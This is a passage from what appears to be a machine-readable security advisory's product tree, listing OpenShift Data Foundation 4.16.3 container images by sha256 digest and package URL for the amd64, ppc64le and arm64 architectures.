"pkg:oci/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product: { name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product_id: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3?arch=amd64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product: { name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product_id: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6?arch=amd64&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product: { name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product_id: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd?arch=amd64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product_id: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a?arch=amd64&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product_id: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d?arch=amd64&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product: { name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product_id: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996?arch=amd64&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product: { name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product_id: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26?arch=amd64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product: { name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product_id: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388?arch=amd64&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product: { name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product_id: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product_id: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product: { name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product_id: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product: { name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product_id: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product: { name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product_id: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product: { name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product_id: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product: { name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product_id: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product: { name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product_id: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product: { name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product_id: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product: { name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product_id: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product: { name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product_id: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product: { name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product_id: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product: { name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product_id: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product_id: "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product_id: "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product: { name: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product_id: "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product: { name: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product_id: "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product: { name: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product_id: "odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product_id: "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product: { name: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product_id: "odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product: { name: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product_id: "odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product: { name: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product_id: "odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product: { name: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product_id: "odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231?arch=ppc64le&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product: { name: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product_id: "odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product_id: "odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2?arch=ppc64le&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product: { name: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product_id: "odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", product_identification_helper: { purl: 